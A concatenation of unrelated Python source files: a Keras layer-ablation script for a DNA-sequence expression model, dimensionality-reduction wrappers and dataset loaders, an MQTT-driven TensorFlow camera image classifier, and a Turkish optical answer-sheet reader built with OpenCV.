conv_hidden= model_params['conv_hidden']
n_hidden= model_params['n_hidden']
n_heads= model_params['n_heads']
conv_width_motif= model_params['conv_width_motif']
dropout_rate= model_params['dropout_rate']
attention_dropout_rate= model_params['attention_dropout_rate']
lr= model_params['lr']
n_aux_layers= model_params['n_aux_layers']
n_attention_layers= model_params['n_attention_layers']
add_cooperativity_layer= model_params['add_cooperativity_layer']
device_type = model_params['device_type']
input_shape = model_params['input_shape']
loss = model_params['loss']
padding = model_params['padding']
ablated_layer = model_params['ablated_layer']
if(model_params['device_type']=='tpu'):
input_layer = Input(batch_shape=(batch_size,input_shape[1],input_shape[2])) #trX.shape[1:] #batch_shape=(batch_size,110,4)
else :
input_layer = Input(shape=input_shape[1:]) #trX.shape[1:] #
#https://arxiv.org/pdf/1801.05134.pdf
if (ablated_layer == 'conv1') :
x_f = input_layer
x_rc = input_layer
else :
x_f,x_rc = rc_Conv1D(motif_conv_hidden, conv_width_motif, padding=padding , \
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight), kernel_initializer='he_normal' ,
data_format = 'channels_last' , use_bias=False)(input_layer)
x_f = BatchNormalization()(x_f)
x_rc = BatchNormalization()(x_rc)
x_f = Activation('relu')(x_f)
x_rc = Activation('relu')(x_rc)
if (ablated_layer == 'conv2') :
add_cooperativity_layer = False
if(add_cooperativity_layer==True) :
x_f = Lambda(lambda x : K.expand_dims(x,axis=1))(x_f)
x_rc = Lambda(lambda x : K.expand_dims(x,axis=1))(x_rc)
x =Concatenate(axis=1)([x_f, x_rc] )
x = keras.layers.ZeroPadding2D(padding = ((0,0 ),(int(conv_width_motif/2)-1,int(conv_width_motif/2))),
data_format = 'channels_last')(x)
x = Conv2D(conv_hidden, (2,conv_width_motif), padding='valid' ,\
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight), kernel_initializer='he_normal' ,
data_format = 'channels_last' , use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Lambda(lambda x : K.squeeze(x,axis=1))(x)
else:
x =Add()([x_f, x_rc] )
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Dropout(dropout_rate)(x)
if (ablated_layer == 'conv3') :
n_aux_layers = 0
for i in range(n_aux_layers) :
#res_input = x
x = Conv1D(conv_hidden, (conv_width_motif), padding=padding ,\
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight), kernel_initializer='he_normal' ,
data_format = 'channels_last' , use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
#x = Add()([res_input, x])
if (ablated_layer == 'transformer') :
n_attention_layers = 0
for i in range(n_attention_layers) :
mha_input = x
x = MultiHeadAttention( head_num=n_heads,name='Multi-Head'+str(i),
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight))(x) #### DO NOT MAX POOL or AVG POOL
        if dropout_rate > 0.0:
            x = Dropout(rate=attention_dropout_rate)(x)
x = Add()([mha_input, x])
x = LayerNormalization()(x)
ff_input = x
x = FeedForward(units= n_heads, kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight))(x)
        if dropout_rate > 0.0:
            x = Dropout(rate=attention_dropout_rate)(x)
x = Add()([ff_input, x])
x = LayerNormalization()(x)
if (ablated_layer != 'lstm') :
x = Bidirectional(LSTM(n_heads, return_sequences=True,
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight),
kernel_initializer='he_normal' , dropout = dropout_rate))(x)
x = Dropout(dropout_rate)(x)
if(len(x.get_shape())>2):
x = Flatten()(x)
if (ablated_layer != 'dense') :
x = Dense(int(n_hidden),
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight),
kernel_initializer='he_normal' , use_bias=True)(x)
x = Activation('relu')(x)
x = Dropout(dropout_rate)(x) #https://arxiv.org/pdf/1801.05134.pdf
x = Dense(int(n_hidden), kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight),
kernel_initializer='he_normal', use_bias=True )(x)
x = Activation('relu')(x)
x = Dropout(dropout_rate)(x) #https://arxiv.org/pdf/1801.05134.pdf
output_layer = Dense(1, kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight),
activation='linear', kernel_initializer='he_normal', use_bias=True )(x)
model = Model(input_layer, output_layer)
opt = tf.train.RMSPropOptimizer(lr) #tf.keras.optimizers.Adam(lr=lr)#
model.compile(optimizer=opt, loss=loss,metrics=['mean_squared_error', 'cosine_similarity'])
return model
ablated_layer_list = sys.argv  # e.g. ['conv1', 'conv2', 'conv3', 'transformer', 'lstm', 'dense', 'None']
for ablated_layer in ablated_layer_list :
model_params = {
'n_val_epoch' : 1000,
'epochs' : 1,
'batch_size': int(1024*1), # int(1024*3) , #64*55 fits , #best batch size is 1024
'l1_weight': 0,#1e-6#1e-7#0.01 # l1 should always be zero
'l2_weight': 0,#1e-7#0.01
'motif_conv_hidden': 256,
'conv_hidden': 64,
'n_hidden': 64, #128
'n_heads': 8,
'conv_width_motif':30, ##30bp for yeast is required for capturing all motifs
'dropout_rate': 0.05,
'lr':0.001,
'add_cooperativity_layer': True,
'n_aux_layers': 1,
'n_attention_layers':2,
'attention_dropout_rate' : 0,
'device_type' : 'gpu', #'tpu'/'gpu'/'cpu'
'input_shape' : input_shape,
'loss' : 'mean_squared_error',
'padding' : 'same',
'ablated_layer' : ablated_layer }
epochs = model_params['epochs']
batch_size = model_params['batch_size']
n_val_epoch = model_params['n_val_epoch']
epochs = model_params['epochs']
test_variable = ablated_layer
### Save model params as csv
w = csv.writer(open((test_variable+'_model_params.csv'), "w"))
for key, val in model_params.items():
w.writerow([key, val])
### Save model params as pickle
f = open((test_variable+'_model_params.pkl'),"wb")
pickle.dump(model_params,f)
f.close()
model=fitness_function_model(model_params)
print(model.summary())
model.fit(trX, trY, validation_data = (vaX[:100], vaY[:100]), batch_size=batch_size , epochs=epochs )
#model.fit_generator(training_generator, validation_data = (teX[:100], teY[:100]),
#epochs=epochs , steps_per_epoch = int(trX.shape[0]/(batch_size*n_val_epoch)) )
def read_hq_testdata(filename) :
with open(filename) as f:
reader = csv.reader(f, delimiter="\t")
d = list(reader)
sequences = [di[0] for di in d]
for i in tqdm(range(0,len(sequences))) :
if (len(sequences[i]) > 110) :
sequences[i] = sequences[i][-110:]
if (len(sequences[i]) < 110) :
while (len(sequences[i]) < 110) :
sequences[i] = 'N'+sequences[i]
A_onehot = np.array([1,0,0,0] , dtype=np.bool)
C_onehot = np.array([0,1,0,0] , dtype=np.bool)
G_onehot = np.array([0,0,1,0] , dtype=np.bool)
T_onehot = np.array([0,0,0,1] , dtype=np.bool)
N_onehot = np.array([0,0,0,0] , dtype=np.bool)
mapper = {'A':A_onehot,'C':C_onehot,'G':G_onehot,'T':T_onehot,'N':N_onehot}
worddim = len(mapper['A'])
seqdata = np.asarray(sequences)
seqdata_transformed = seq2feature(seqdata)
print(seqdata_transformed.shape)
expressions = [di[1] for di in d]
expdata = np.asarray(expressions)
expdata = expdata.astype('float')
return np.squeeze(seqdata_transformed),expdata
X,Y = read_hq_testdata(os.path.join('..','..','..','data','Glu','HQ_testdata.txt'))
Y = [float(x) for x in Y]
Y_pred= model.predict(X, batch_size = 1024)
Y_pred = [float(i[0]) for i in Y_pred]
pcc = scipy.stats.pearsonr(Y,Y_pred )[0]
print(pcc)
df = pd.DataFrame({'Y' : Y , 'Y_pred' : Y_pred , 'pcc' : pcc})
df.to_csv(ablated_layer+"_results.csv")
model.save(ablated_layer+"_model.h5")
##Clear Memory
tf.reset_default_graph()
tf.keras.backend.clear_session()
gc.collect()
##
``` |
{
"source": "1eg1on/dimreducers-crusher",
"score": 3
} |
#### File: dimreducers_crusher/crusher/reducers.py
```python
class BaseReducer:
def __init__(self, outdim=2, **kwargs):
pass
def fit(self, X):
pass
def transform(self, X):
pass
def fit_transform(
self, X,
):
self.fit(X)
return self.transform(X)
class UmapReducer(BaseReducer):
def __init__(self, outdim=2, **kwargs):
import umap
self.reducer = umap.UMAP(n_components=outdim, **kwargs)
def fit(self, X):
self.reducer.fit(X)
def transform(self, X):
return self.reducer.transform(X)
class TrimapReducer(BaseReducer):
def __init__(self, outdim=2, **kwargs):
import trimap
self.reducer = trimap.TRIMAP(n_dims=outdim)
def fit(self, X):
self.reducer.fit(X)
def transform(self, X):
return self.reducer.embedding_
class PyMDENeigh(BaseReducer):
def __init__(self, outdim=2, **kwargs):
self.outdim = outdim
self.kwargs = kwargs
def fit(self, X):
import pymde
self.reducer = pymde.preserve_neighbors(
X, embedding_dim=self.outdim, **self.kwargs
)
def transform(self, X):
return self.reducer.embed()
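

# A minimal usage sketch (assumes the optional umap-learn dependency is
# installed). All reducers share the BaseReducer interface, so the same two
# lines work for TrimapReducer and PyMDENeigh as well.
if __name__ == "__main__":
    import numpy as np

    X = np.random.rand(100, 16)
    embedding = UmapReducer(outdim=2).fit_transform(X)
    print(embedding.shape)  # expected: (100, 2)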
```
#### File: dimreducers_crusher/datasets/CovTypeDataset.py
```python
import sklearn
import numpy as np
from .AbstractDataset import AbstractDataset
from sklearn.datasets import fetch_covtype
# shape: (581012, 54)
class CovTypeDataset(AbstractDataset):
def __init__(self):
super().__init__()
def get(self, **kwargs) -> np.ndarray:
try:
print('Fetching CovType dataset...')
data = fetch_covtype(download_if_missing = True, shuffle = True)
X, y = data['data'], data['target']
return X, y
        except Exception as e:
            raise RuntimeError('Failed to fetch the CovType dataset') from e
@property
def is_sparse(self) -> bool:
return False
```
#### File: dimreducers_crusher/datasets/FashionMNISTDataset.py
```python
from .AbstractDataset import AbstractDataset
from typing import Union
import numpy as np
import scipy.sparse as sps
import torchvision
import warnings
# Original datasource: https://github.com/zalandoresearch/fashion-mnist
# Shape: (60000, 784)
class FashionMNISTDataset(AbstractDataset):
def __init__(self):
super().__init__()
def get(self, data_dir: str, **kwargs) -> Union[sps.spmatrix, np.ndarray]:
try:
train = torchvision.datasets.FashionMNIST(data_dir, download = True)
X = train.data.numpy().reshape(-1, 28 * 28)
return sps.csr_matrix(X)
        except Exception as e:
            raise RuntimeError('Failed to download the FashionMNIST dataset') from e
@property
def is_sparse(self) -> bool:
return True
```
#### File: dimreducers_crusher/datasets/TwentyNewsgroups.py
```python
from .AbstractDataset import AbstractDataset
from typing import Union
import numpy as np
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
import scipy.sparse as sps
import warnings
# Original datasource: http://qwone.com/~jason/20Newsgroups/
# Pipeline as in https://scikit-learn.org/stable/auto_examples/model_selection/grid_search_text_feature_extraction.html#sphx-glr-auto-examples-model-selection-grid-search-text-feature-extraction-py
# Shape: (11314, 130107)
class TwentyNewsgroups(AbstractDataset):
def __init__(self):
super().__init__()
def get(self, random_state: int = 42, **kwargs) -> Union[sps.spmatrix, np.ndarray]:
try:
dataset = fetch_20newsgroups(subset = 'train', random_state = random_state)
cvec = CountVectorizer()
tfidfvec = TfidfTransformer()
data = cvec.fit_transform(dataset.data)
data = tfidfvec.fit_transform(data)
return data
        except Exception as e:
            raise RuntimeError('Failed to fetch the 20 Newsgroups dataset') from e
@property
def is_sparse(self) -> bool:
return True
```
#### File: dimreducers_crusher/utils/distances.py
```python
import numpy as np
import scipy.sparse as sps
from typing import Union
def fast_euclidean(data: np.ndarray) -> np.ndarray:
    # Expand ||a - b||^2 = ||a||^2 - 2<a, b> + ||b||^2 row-wise.
    dd = np.sum(data * data, axis=1)
    dist = -2 * np.dot(data, data.T)
    dist += dd + dd[:, np.newaxis]
    np.fill_diagonal(dist, 0)
    # Clamp tiny negative values produced by floating-point error before the in-place sqrt.
    np.maximum(dist, 0, out=dist)
    np.sqrt(dist, out=dist)
    return dist
def distance_matrix(data: Union[np.ndarray, sps.spmatrix], metric: str = 'euclidean'):
if metric in ('euclidean', 'euc') and isinstance(data, np.ndarray):
return fast_euclidean(data)
raise NotImplementedError
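

# A minimal usage sketch: pairwise Euclidean distances for a small dense matrix.
if __name__ == "__main__":
    pts = np.random.rand(5, 3)
    D = distance_matrix(pts, metric="euclidean")
    print(D.shape)  # (5, 5); the diagonal is zero by construction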
``` |
{
"source": "1element/ip-camera-image-inference",
"score": 2
} |
#### File: 1element/ip-camera-image-inference/image-inference.py
```python
from __future__ import absolute_import
import yaml
import logging
import os
import datetime
import Queue
import numpy as np
import tensorflow as tf
import paho.mqtt.client as paho
NUM_PREDICTIONS = 2
config = None
labels = None
mqtt_client = None
image_queue = Queue.Queue()
def load_config():
"""Load config yaml file."""
global config
with open('config.yml', 'r') as file:
        config = yaml.safe_load(file)  # safe_load avoids arbitrary object construction
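# Assumed config.yml layout (keys inferred from their usage in this module;
# all values are illustrative only):
#
# logging:
#   level: INFO
#   filename: inference.log
# inference:
#   model_dir: /opt/model
#   threshold: 0.9
# save_images:
#   enabled: true
#   destination: /var/images
# mqtt:
#   host: broker.example.com
#   port: 8883
#   username: user
#   password: secret
#   subscribe_topic: camera/image
#   publish_topic: camera/detected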
def configure_logging():
"""Configure logging."""
numeric_level = getattr(logging, config['logging']['level'])
logging.basicConfig(level=numeric_level,
filename=config['logging']['filename'],
format='%(asctime)s %(levelname)s: %(message)s')
def create_graph():
"""Creates a tensorflow graph from saved GraphDef file."""
with tf.gfile.FastGFile(os.path.join(
config['inference']['model_dir'], 'output_graph.pb'), 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='')
def load_labels():
"""Read in labels, one label per line."""
filename = os.path.join(config['inference']['model_dir'], 'output_labels.txt')
global labels
labels = [line.rstrip() for line in tf.gfile.FastGFile(filename)]
def save_image(image):
"""Save image file if enabled in configuration."""
if config['save_images']['enabled']:
directory = config['save_images']['destination']
filename = datetime.datetime.now().strftime("%Y%m%d-%H%M%S%f") + '.jpg'
destination = os.path.join(directory, filename)
logging.debug('saving image to %s', destination)
        with open(destination, 'wb') as f:
            f.write(image)
def mqtt_connect():
"""Create MQTT client and connect to broker."""
global mqtt_client
logging.debug('connecting to mqtt broker %s', config['mqtt']['host'])
mqtt_client = paho.Client()
mqtt_client.tls_set()
mqtt_client.on_connect = mqtt_on_connect
mqtt_client.on_message = mqtt_on_message
mqtt_client.username_pw_set(config['mqtt']['username'], config['mqtt']['password'])
mqtt_client.connect(config['mqtt']['host'], config['mqtt']['port'])
mqtt_client.loop_start()
def mqtt_on_connect(client, userdata, flags, rc):
"""Callback on MQTT connection."""
logging.debug('successfully connected to mqtt broker')
client.subscribe(config['mqtt']['subscribe_topic'])
def mqtt_on_message(client, userdata, msg):
"""Callback on MQTT message."""
logging.debug('mqtt message received for topic %s', msg.topic)
image_queue.put(msg.payload)
def mqtt_publish(image):
"""Publish image to MQTT broker."""
logging.debug('publishing image to mqtt broker topic %s',
config['mqtt']['publish_topic'])
mqtt_client.publish(config['mqtt']['publish_topic'], image)
def serve_inference_requests():
"""Infinite loop serving inference requests."""
global image_queue
with tf.Session() as sess:
while True:
image_data = image_queue.get()
tensor = sess.graph.get_tensor_by_name('final_result:0')
predictions = sess.run(tensor, {'DecodeJpeg/contents:0': image_data})
predictions = np.squeeze(predictions)
top_k = predictions.argsort()[-NUM_PREDICTIONS:][::-1]
human_string = labels[top_k[0]]
score = predictions[top_k[0]]
logging.info('%s classified with score %.5f', human_string, score)
emit_image = False
if human_string != 'nothing':
emit_image = True
                logging.debug('emitting image because %s was detected', human_string)
elif score <= config['inference']['threshold']:
emit_image = True
                logging.debug('emitting image because score %.5f is below threshold of %s',
score, config['inference']['threshold'])
else:
                logging.debug('image not emitted because nothing was detected with a probability of %.5f',
score)
if emit_image:
mqtt_publish(image_data)
else:
save_image(image_data)
def main(_):
# disable tensorflow compilation warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
create_graph()
load_labels()
serve_inference_requests()
if __name__ == '__main__':
load_config()
configure_logging()
mqtt_connect()
# run tensorflow main app
tf.app.run(main=main)
``` |
{
"source": "1enes/optical_form_reader",
"score": 2
} |
#### File: optical_form_reader/optical_form_reader/main.py
```python
import cv2
import matplotlib.pyplot as plt
import numpy as np
from imutils import contours
from imutils.perspective import four_point_transform, order_points
import imutils
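# cevap_anahtar maps question index -> index of the correct option (0=A ... 4=E);
# alfabe maps a bubble's row index in the name grid to its letter.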
cevap_anahtar={0:2,1:1,2:2,3:3,4:1,5:4,6:4,7:3,8:1,9:1,10:0,11:0,12:2,13:1,14:2,15:3,16:4,17:4,18:4,19:3,20:2,21:1,22:0,23:0,24:0,25:4,26:2,27:3,28:4,29:4,30:4,31:3,32:2,33:1,34:0,35:0,36:1,37:2,38:3,39:4} #,
alfabe={0:'A',1:'B',2:'C',3:'Ç',4:'D',5:'E',6:'F',7:'G',8:'Ğ',9:'H',10:'I',11:'İ',12:'J',13:'K',14:'L',15:'M',16:'N',17:'O',18:'Ö',19:'P',20:'Q',21:'R',22:'S',23:'Ş',24:'T',25:'U',26:'Ü',27:'V',28:'W',29:'Y',30:'Z',31:'X'}
def cevap_contour_bul(isim,isim_gri):
coord=[]
thresholded=cv2.adaptiveThreshold(isim_gri,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY_INV,9,8)
contour=cv2.findContours(thresholded,cv2.RETR_LIST,cv2.CHAIN_APPROX_NONE)
x_coords=[(0,0)]
sayac=0
contour=imutils.grab_contours(contour)
contour=contours.sort_contours(contour,method="top-to-bottom")[0]
for c in contour:
approx=cv2.approxPolyDP(c,0.0001*cv2.arcLength(c,True),True)
area=cv2.contourArea(approx)
(x, y, w, h) = cv2.boundingRect(approx)
ar = w / float(h)
if area<1500 and area>250 and ar>=0.9 and ar<=1.1:
box=cv2.minAreaRect(approx)
box=cv2.boxPoints(box)
box=np.array(box,dtype=np.int)
M=cv2.moments(box)
x=int(M['m10']/M['m00'])
y=int(M['m01']/M['m00'])
res=tekrar_bul(x_coords,x)
if res is False and abs(x_coords[-1][1]-y)<35:
coord.append(approx)
x_coords.append((x,y))
sayac+=1
#cv2.drawContours(isim,[box],0,(255,0,0),thickness=3)
#cv2.drawContours(isim,[approx],0,(0,0,255),thickness=2)
elif abs(x_coords[-1][1]-y)>=35:
coord.append(approx)
x_coords=[(0,0)]
sayac+=1
x_coords.append((x,y))
#cv2.drawContours(isim,[box],0,(255,0,0),thickness=3)
#cv2.drawContours(isim,[approx],0,(0,0,255),thickness=2)
else:
continue
return coord
def ters_bul(kagit,areas):
ret=False
#print(areas[0][0])
if areas[0][0]!=1 and areas[0][1]+areas[1][1]>2300000:
kagit=imutils.rotate(kagit,angle=180)
print("Kağıdı ters koymuşsunuz,çevrildi")
ret=True
return ret,kagit
else:
return ret,kagit
def kagit_bul(image,gray):
thr=cv2.threshold(gray,150,255,cv2.THRESH_BINARY)[1]
contour=cv2.findContours(thr,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)
contour=imutils.grab_contours(contour)
contour=sorted(contour,key=cv2.contourArea,reverse=True)
for c in contour:
approx=cv2.approxPolyDP(c,0.02*cv2.arcLength(c,True),True)
if len(approx)==4:
#cv2.drawContours(image,[approx],0,(0,255,0),thickness=3)
break
warp=four_point_transform(image,approx.reshape(4,2))
warp_gri=four_point_transform(gray,approx.reshape(4,2))
return warp,warp_gri
def soru_grup_contour_bul(resim,gri):
thr2=cv2.threshold(gri,0,255,cv2.THRESH_BINARY_INV|cv2.THRESH_OTSU)[1]
can=cv2.Canny(thr2,50,100)
can=cv2.dilate(can,None,iterations=3)
coords=[]
cont=cv2.findContours(can,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)
cont=imutils.grab_contours(cont)
for c in cont:
approx=cv2.approxPolyDP(c,0.0001*cv2.arcLength(c,True),True)
area=cv2.contourArea(approx)
(x, y, w, h) = cv2.boundingRect(approx)
ar = w / float(h)
if cv2.contourArea(c)>30 and ar>=0.9 and ar<=1.1:
box=cv2.minAreaRect(approx)
box=cv2.boxPoints(box)
box=np.array(box,dtype=np.int)
if cv2.contourArea(box)>150:
coords.append(approx)
cv2.drawContours(resim,[box],0,(0,0,255),thickness=3)
if len(coords)==5:
return coords
else:
return 0
def tekrar_bul(array,koordinat):
for c in array:
if koordinat==c[0] or abs(koordinat-c[0])<15:
            return True  # duplicate coordinate found
else:
pass
return False
def contour_bul(isim,isim_gri,karmasiklik=0):
coord=[]
thr6=cv2.adaptiveThreshold(isim_gri,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY_INV,9,8)
#thr6=cv2.threshold(isim_gri,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)[1]
ar_value=200
#if karmasiklik==1:
# ar_value=800
cont=cv2.findContours(thr6,cv2.RETR_LIST,cv2.CHAIN_APPROX_NONE)
x_coords=[(0,0)]
sayac=0
cont=imutils.grab_contours(cont)
cont=contours.sort_contours(cont,method="top-to-bottom")[0]
for c in cont:
approx=cv2.approxPolyDP(c,0.0001*cv2.arcLength(c,True),True)
area=cv2.contourArea(approx)
(x, y, w, h) = cv2.boundingRect(approx)
ar = w / float(h)
if area<1300 and area>300 and ar>=0.9 and ar<=1.1:
box=cv2.minAreaRect(approx)
box=cv2.boxPoints(box)
box=np.array(box,dtype=np.int)
M=cv2.moments(box)
x=int(M['m10']/M['m00'])
y=int(M['m01']/M['m00'])
# print(x,y)
res=tekrar_bul(x_coords,x)
if res is False and abs(x_coords[-1][1]-y)<35:
coord.append(approx)
x_coords.append((x,y))
sayac+=1
#cv2.drawContours(isim,[box],0,(255,0,0),thickness=3)
#cv2.drawContours(isim,[approx],0,(0,0,255),thickness=2)
elif abs(x_coords[-1][1]-y)>=35:
coord.append(approx)
x_coords=[(0,0)]
sayac+=1
x_coords.append((x,y))
#cv2.drawContours(isim,[box],0,(255,0,0),thickness=3)
#cv2.drawContours(isim,[approx],0,(0,0,255),thickness=2)
else:
continue
return coord,thr6
def contour_cizdir(resim,cont,isim="default"):
for c in cont:
cv2.drawContours(resim,[c],0,(0,255,0),thickness=4)
#print(f"Bulunan contour sayısı: {len(cont)}")
def bolge_bul(resim,gri):
bolgeler={}
thr2=cv2.adaptiveThreshold(gri,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY_INV,9,8)
areas=[]
cont=cv2.findContours(thr2,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)
cont=imutils.grab_contours(cont)
temp=[]
cont=contours.sort_contours(cont,"top-to-bottom")[0]
a=0
for c in cont:
approx=cv2.approxPolyDP(c,0.009*cv2.arcLength(c,True),True)
if cv2.contourArea(approx)>10050 and len(approx)==4:
a+=1
M=cv2.moments(approx)
x=int(M['m10']/M['m00'])
y=int(M['m01']/M['m00'])
#areas.append([a,cv2.contourArea(approx)])
#cv2.putText(resim,"{}".format(a),(x,y),fontFace=cv2.FONT_HERSHEY_COMPLEX,fontScale=4,color=(255,0,0),thickness=3)
temp.append(approx.reshape(4,2))
areas.append([a,cv2.contourArea(approx)])
#cv2.drawContours(resim,[approx],0,(255,0,0),thickness=3)
#cv2.imshow("resim_olge",imutils.resize(resim,height=650))
    if len(temp)>=6:  # six regions are unpacked below (temp[0]..temp[5])
bolgeler={'isim':temp[0],'ogrno':temp[1],'sinav_turu':temp[2],'soru_grubu':temp[3],'ogretim_onay':temp[4],'cevaplar':temp[5]}
areas=sorted(areas,key=lambda x:x[1],reverse=True)
return bolgeler,areas
def cevap_islemleri(cevap,coords,col_no=1):
iki_cevap=0
bos=0
dogru=0
q_no=0
yanlıs=0
if col_no==1:
pass
elif col_no==2:
q_no=30
elif col_no==3:
q_no=60
elif col_no==4:
q_no=90
yanit=[]
#cevap=cv2.cvtColor(cevap,cv2.COLOR_BGR2GRAY)
thresh=cv2.threshold(cevap,180,255,cv2.THRESH_BINARY_INV)[1]
coords=contours.sort_contours(coords,method="top-to-bottom")[0]
for (s,i) in enumerate(np.arange(0,len(coords),5)):
cevap=None
cnt=contours.sort_contours(coords[i:i+5])[0]
toplam_beyaz=None
say=0
for (j,c) in enumerate(cnt):
if len(cevap_anahtar)<=q_no+s:
return (dogru,yanlıs,bos,iki_cevap)
maske=np.zeros(thresh.shape,dtype=np.uint8)
cv2.drawContours(maske,[c],0,(255,255,255),thickness=-1)
maske=cv2.bitwise_and(thresh,thresh,mask=maske)
plt.imshow(maske,cmap='gray')
#plt.show()
toplam_beyaz=cv2.countNonZero(maske)
#print(toplam_beyaz,j)
if cevap is None or toplam_beyaz>cevap[0]:
cevap=(toplam_beyaz,j,q_no+s)
if toplam_beyaz>800:
say+=1
        if say>1:  # more than one option marked
iki_cevap+=1
continue
        elif cevap[0]<800:  # question left blank
bos+=1
continue
else:
if cevap_anahtar[q_no+s]== cevap[1]:
#print(cevap_anahtar[q_no+s],cevap[1])
dogru+=1
else:
yanlıs+=1
    '''
    Returns (correct, wrong, blank, double-marked) answer counts.
    '''
return(dogru,yanlıs,bos,iki_cevap)
def isim_islemleri(isim,coords,thresh):
a=0
yanit=[]
ad_str=""
coords=contours.sort_contours(coords,method="left-to-right")[0]
for (s,i) in enumerate(np.arange(0,len(coords),32)):
cevap=None
cnt=contours.sort_contours(coords[i:i+32],method="top-to-bottom")[0]
toplam_beyaz=None
for (j,c) in enumerate(cnt):
maske=np.zeros(thresh.shape,dtype=np.uint8)
cv2.drawContours(maske,[c],0,(255,255,255),thickness=-1)
maske=cv2.bitwise_and(thresh,thresh,mask=maske)
#plt.imshow(maske,cmap='gray')
#plt.show()
#a+=1
toplam_beyaz=cv2.countNonZero(maske)
#print(toplam_beyaz,j)
if cevap is None or toplam_beyaz>cevap[0]:
cevap=(toplam_beyaz,j,s)
# print("cevap",cevap)
if cevap[0]>500:
yanit.append(alfabe[cevap[1]])
elif cevap[0]<600:
yanit.append(" ")
for s in yanit:
ad_str+=s
return ad_str
def cevap_kolon(cevap):
pts1=np.array([(2,50),(300,50),(2,1545),(300,1545)])
pts2=np.array([(300,50),(600,50),(302,1545),(602,1545)])
pts3=np.array([(600,50),(900,50),(602,1545),(902,1545)])
pts4=np.array([(900,50),(1200,50),(902,1545),(1202,1545)])
col1=four_point_transform(cevap,pts1)
col2=four_point_transform(cevap,pts2)
col3=four_point_transform(cevap,pts3)
col4=four_point_transform(cevap,pts4)
return col1,col2,col3,col4
def cevap_gri(col1,col2,col3,col4):
    '''
    Convert the answer columns to grayscale (kept here so main stays uncluttered).
    '''
col1_gri=cv2.cvtColor(col1,cv2.COLOR_BGR2GRAY)
col2_gri=cv2.cvtColor(col2,cv2.COLOR_BGR2GRAY)
col3_gri=cv2.cvtColor(col3,cv2.COLOR_BGR2GRAY)
col4_gri=cv2.cvtColor(col4,cv2.COLOR_BGR2GRAY)
return col1_gri,col2_gri,col3_gri,col4_gri
def cevap_contour(col1,col2,col3,col4):
col1_gri,col2_gri,col3_gri,col4_gri=cevap_gri(col1,col2,col3,col4)
col1_coord=cevap_contour_bul(col1,col1_gri)
    col2_coord=cevap_contour_bul(col2,col2_gri)
    col3_coord=cevap_contour_bul(col3,col3_gri)
    col4_coord=cevap_contour_bul(col4,col4_gri)
return col1_coord,col2_coord,col3_coord,col4_coord
def ogrno_islemleri(ogrno,ogrno_gri,coords):
yanit=""
thresh=cv2.threshold(ogrno_gri,180,255,cv2.THRESH_BINARY_INV)[1]
coords=contours.sort_contours(coords,method="left-to-right")[0]
for (s,i) in enumerate(np.arange(0,len(coords),10)):
cevap=None
cnt=contours.sort_contours(coords[i:i+10],method="top-to-bottom")[0]
toplam_beyaz=None
for (j,c) in enumerate(cnt):
maske=np.zeros(thresh.shape,dtype=np.uint8)
cv2.drawContours(maske,[c],0,(255,255,255),thickness=-1)
maske=cv2.bitwise_and(thresh,thresh,mask=maske)
plt.imshow(maske,cmap='gray')
#plt.show()
toplam_beyaz=cv2.countNonZero(maske)
if cevap is None or toplam_beyaz>cevap[0]:
cevap=(toplam_beyaz,j,s)
if cevap[0]>500:
yanit+=str(cevap[1])
print("Okul Numarası:",yanit)
def sinav_islemleri(sinav,sinav_gri,coords):
yanit=["QUİZ","ARA","FİNAL","BÜTÜNLEME"]
thresh=cv2.threshold(sinav_gri,180,255,cv2.THRESH_BINARY_INV)[1]
coords=contours.sort_contours(coords,method="top-to-bottom")[0]
for (s,i) in enumerate(np.arange(0,len(coords),10)):
cevap=None
cnt=contours.sort_contours(coords[i:i+10],method="left-to-right")[0]
toplam_beyaz=None
for (j,c) in enumerate(cnt):
maske=np.zeros(thresh.shape,dtype=np.uint8)
cv2.drawContours(maske,[c],0,(255,255,255),thickness=-1)
maske=cv2.bitwise_and(thresh,thresh,mask=maske)
plt.imshow(maske,cmap='gray')
#plt.show()
toplam_beyaz=cv2.countNonZero(maske)
if cevap is None or toplam_beyaz>cevap[0]:
cevap=(toplam_beyaz,j,s)
return yanit[cevap[1]]
def sorugrup_islemleri(soru,soru_gri,coords):
yanit=["A","B","C","D","E"]
sayac=0
thresh=cv2.threshold(soru_gri,180,255,cv2.THRESH_BINARY_INV)[1]
coords=contours.sort_contours(coords,method="top-to-bottom")[0]
for (s,i) in enumerate(np.arange(0,len(coords),10)):
cevap=None
cnt=contours.sort_contours(coords[i:i+10],method="left-to-right")[0]
toplam_beyaz=None
for (j,c) in enumerate(cnt):
maske=np.zeros(thresh.shape,dtype=np.uint8)
cv2.drawContours(maske,[c],0,(255,255,255),thickness=-1)
maske=cv2.bitwise_and(thresh,thresh,mask=maske)
plt.imshow(maske,cmap='gray')
#plt.show()
sayac+=1
toplam_beyaz=cv2.countNonZero(maske)
if cevap is None or toplam_beyaz>cevap[0]:
cevap=(toplam_beyaz,j,s)
if sayac==5:
break
print(cevap)
if cevap[0]>500:
return yanit[cevap[1]]
#print("tespit edilemedi")
return "Tespit edilemedi"
####################################################################
def main_starter(bos_kagit,dolu_kagit):
